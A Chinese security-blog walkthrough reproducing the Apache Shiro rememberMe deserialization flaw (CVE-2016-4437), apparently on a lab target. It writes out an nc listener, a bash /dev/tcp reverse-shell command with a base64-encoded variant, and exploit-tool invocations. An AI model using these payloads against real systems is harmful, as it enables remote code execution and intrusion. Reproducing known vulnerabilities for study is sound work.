freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

【漏洞复现】shiro 反序列化 (CVE-2016-4437)
我是废物 2023-08-17 21:55:33 434506

漏洞介绍

Apache Shiro是一个强大且易用的Java安全框架,执行身份验证、授权、密码和会话管理。使用Shiro易于理解的API,开发者可以快速、轻松地获得任何应用程序,从最小的移动应用程序到最大的网络和企业应用程序

在Shiro <= 1.2.4中,反序列化过程中所用到的AES加密的key是硬编码在源码中,当用户勾选RememberMe并登录成功,Shiro会将用户的cookie值序列化,AES加密,接着base64编码后存储在cookie的rememberMe字段中,服务端收到登录请求后,会对rememberMe的cookie值进行base64解码,接着进行AES解密,然后反序列化。由于AES加密是对称式加密(key既能加密数据也能解密数据),所以当攻击者知道了AES key后,就能够构造恶意的rememberMe cookie值从而触发反序列化漏洞

poc

使用burp抓取当前页面数据包,在cookie中添加rememberMe=1,在响应包中显示两个Set-Cookie: rememberMe=deleteMe,说明存在shiro框架可能存在漏洞
在这里插入图片描述

exp

我的vm虚拟机 kali IP: 192.168.100.131

我的花生壳 映射外网地址 103.46.128.21:49040-> 192.168.100.131:8888
在这里插入图片描述

使用Shiro_exploit进行漏洞利用

项目地址:https://github.com/insightglacier/Shiro_exploit

检测是否存在shiro漏洞

python .\shiro_exploit.py -u http://123.58.224.8:25050/

在这里插入图片描述
vulnerable:True表示存在shiro漏洞

在这里插入图片描述

反弹shell利用

  • kali 监听

nc -lnvp 8888

在这里插入图片描述

  • 执行利用脚本

python shiro_exploit.py -t 3 -u  http://123.58.224.8:25050/  -p "bash加密命令"
# bash命令
bash -i >& /dev/tcp/103.46.128.21/49040 0>&1
# bash加密后命令
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMDMuNDYuMTI4LjIxLzQ5MDQwIDA+JjE=}|{base64,-d}|{bash,-i}
python shiro_exploit.py -t 3 -u   http://123.58.224.8:25050/  -p "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMDMuNDYuMTI4LjIxLzQ5MDQwIDA+JjE=}|{base64,-d}|{bash,-i}"

在这里插入图片描述
成功反弹shell
在这里插入图片描述

使用一键利用工具复现

项目地址:https://github.com/j1anFen/shiro_attack/releases/tag/2.2

# 漏洞分析
本文为 我是废物 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
手上对对对
我是废物 LV.5
这家伙太懒了,还未填写个人描述!
  • 10 文章数
  • 7 关注者
内网穿透(nc)
2023-10-11
攻防世界web篇之Web_php_include
2023-08-17
【漏洞复现】Windows SMB远程代码执行漏洞(CVE-2020-0796)
2023-08-17
文章目录